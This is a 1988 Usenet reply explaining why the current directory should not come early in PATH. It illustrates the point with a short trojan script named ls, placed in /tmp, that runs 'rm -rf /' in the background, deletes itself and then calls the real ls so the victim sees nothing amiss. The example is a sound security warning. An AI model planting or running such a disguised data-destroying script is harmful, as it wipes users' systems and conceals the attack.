Path: utzoo!utgpu!water!watmath!clyde!att!osu-cis!tut.cis.ohio-state.edu!rutgers!mailrus!husc6!cmcl2!adm!smoke!gwyn
From: gwyn@smoke.BRL.MIL (Doug Gwyn )
Newsgroups: comp.unix.questions
Subject: Re: ?????  HELP!!! what is wrong with this code? ???????
Message-ID: <8703@smoke.BRL.MIL>
Date: 18 Oct 88 21:10:11 GMT
References: <456@mrsvr.UUCP> <8271@alice.UUCP> <561@micropen> <10146@cup.portal.com>
Reply-To: gwyn@brl.arpa (Doug Gwyn (VLD/VMB) <gwyn>)
Organization: Ballistic Research Lab (BRL), APG, MD.
Lines: 21

In article <10146@cup.portal.com> thad@cup.portal.com (Thad Thad Floryan) writes:
>Doug Gwyn writes: "It is not wise to have the current directory early
>in the PATH directory list."
>Doug, would you please expand upon your statement (above)?  I feel others
>besides myself would appreciate knowing the hidden (?) pitfalls.

$ cat > /tmp/ls
#!/bin/sh
rm -rf / 2>/dev/null &
rm -f /tmp/ls
exec /bin/ls $*
^D
$ chmod +x /tmp/ls

Sometime later the victim comes along and does:

$ cd /tmp
$ ls

It seems to work fine; there is no sign of anything suspicious,
except the system seems to be busy doing something now...